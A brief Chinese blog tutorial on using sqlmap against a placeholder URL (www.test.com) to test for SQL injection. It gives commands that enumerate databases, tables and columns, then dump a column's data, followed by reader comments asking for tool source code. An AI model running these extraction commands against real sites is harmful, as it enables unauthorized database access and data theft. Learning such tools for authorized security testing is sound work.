Sqlmap检测SQL注入攻击

| |
[不指定 2017/12/01 13:21 | by admin ]
测试SQL注入:
# sqlmap -u http://www.test.com/index.php?id=1 --dbs
自动探测数据库类型和漏洞,如果成功会列出数据库:
点击在新窗口中浏览此图片

获得某个数据库中的表:
#sqlmap -u http://www.test.com/index.php?id=1 --dbs -D some_db --tables

获得表的字段:
# sqlmap -u http://www.test.com/index.php?id=1 --dbs -D some_db --tables -T some_table --columns

下载某一字段的数据:
# sqlmap -u http://www.test.com/index.php?id=1 --dbs -D some_db --tables -T some_table --columns -C some_col --dump

这款工具也很好用,用来检测SQL漏洞注入比较精确,国内也有好几个SQL注入工具,博主以前也写过注入攻击工具哈;
神器下载地址点击这里,因为看到有人留言想要,还说想要源码,好吧、更新贴出它们官方网站吧。
HelloHK
2018/05/17 14:51
谁说没人留意的呢question
无凡 Email
2018/01/13 15:31
可以发下神器源码出来更好啊grin
分页: 1/1 第一页 1 最后页
发表评论
表情
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
打开HTML
打开UBB
打开表情
隐藏
昵称   密码   游客无需密码
网址   电邮   [注册]
               

验证码 不区分大小写